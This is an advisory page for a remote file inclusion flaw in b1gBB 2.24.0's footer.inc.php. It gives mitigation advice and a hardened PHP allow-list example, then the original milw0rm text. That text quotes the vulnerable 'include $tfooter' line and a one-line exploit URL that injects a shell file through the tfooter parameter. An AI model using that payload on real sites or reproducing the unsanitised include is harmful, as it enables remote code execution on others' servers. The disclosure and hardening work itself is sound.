Vendor: b1g Bulletion Board
By: Rf7awy
CVSS: 7.5 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: b1g Bulletion Board
Affected Version From: 2.24.0
Affected Version To: 2.24.0
Patch Exists: NO
Related CWE:
CPE: a:b1gbb_project:b1g_bulletion_board:2.24.0
Metasploit:
Other Scripts:
Platforms Tested:
2007

b1gBB (b1g Bulletion Board) (footer.inc.php) Remote File Inclusion

The footer.inc.php file in b1gBB (b1g Bulletion Board) allows remote attackers to include arbitrary PHP files via the tfooter parameter in a footer.inc.php request, as demonstrated by including shell.php. This vulnerability can be exploited by an attacker to execute arbitrary code or disclose sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use proper input validation techniques to prevent the inclusion of arbitrary files.
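A hardened form of the include, as an added example that is not b1gBB's own code: the footer is chosen by a short key from a fixed allow-list and resolved to a local file, so no request value ever reaches `include`. The constant `B1GBB_ENTRY`, the variable `$footerKey`, the `templates` directory and the template file names are hypothetical, and the example assumes the vulnerable `$tfooter` was reachable from the request.

```php
<?php
// Added example, not the project's code. Vulnerable form from the advisory:
//     include $tfooter;
// Hardened replacement for footer.inc.php (PHP 7.1+).

// 1. Refuse direct requests. B1GBB_ENTRY is a hypothetical constant that the
//    board's entry script would define before including this file.
if (!defined('B1GBB_ENTRY')) {
    http_response_code(403);
    exit;
}

// 2. Fixed allow-list: short key => local template file (hypothetical names).
const FOOTER_TEMPLATES = [
    'default' => 'footer_default.php',
    'compact' => 'footer_compact.php',
];

// Returns the absolute path of an allowed footer, or null if the key is not
// listed or the file does not resolve inside $baseDir.
function resolve_footer(string $key, string $baseDir): ?string
{
    if (!array_key_exists($key, FOOTER_TEMPLATES)) {
        return null;                       // URLs, paths and unknown keys end here
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . FOOTER_TEMPLATES[$key]);
    if ($base === false || $path === false) {
        return null;                       // directory or template missing
    }
    // Containment check: the resolved file must sit under the template dir,
    // which also catches a symlinked template pointing elsewhere.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// 3. $footerKey (hypothetical) is set by the including script, never taken
//    from a global that the request can populate.
$key    = (isset($footerKey) && is_string($footerKey)) ? $footerKey : 'default';
$dir    = __DIR__ . DIRECTORY_SEPARATOR . 'templates';
$footer = resolve_footer($key, $dir) ?? resolve_footer('default', $dir);

if ($footer !== null) {
    include $footer;                       // always a vetted local path
}

// Defence in depth in php.ini: allow_url_include = Off (the default since
// PHP 5.2) and a PHP version without register_globals (removed in 5.4).
```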

Exploit-DB raw data:

# b1gBB (b1g Bulletion Board) (footer.inc.php) Remote File Inclusion Vulnerabilities

# D.Script :
     http://switch.dl.sourceforge.net/sourceforge/b1gbb/b1gbb-2.24.0.zip

# V.Code :
     include $tfooter

# In :
     footer.inc.php

# Exploits :
http://www.name/path/footer.inc.php?tfooter=shell?


# Discovered by:
     Rf7awy
x59@hotmail.it

thanks
Mahmood_ali

# Homepage:
     http://www.Tryag.Com/cc

# Sp.Thanx To :
     Tryag-Team

# milw0rm.com [2007-06-25]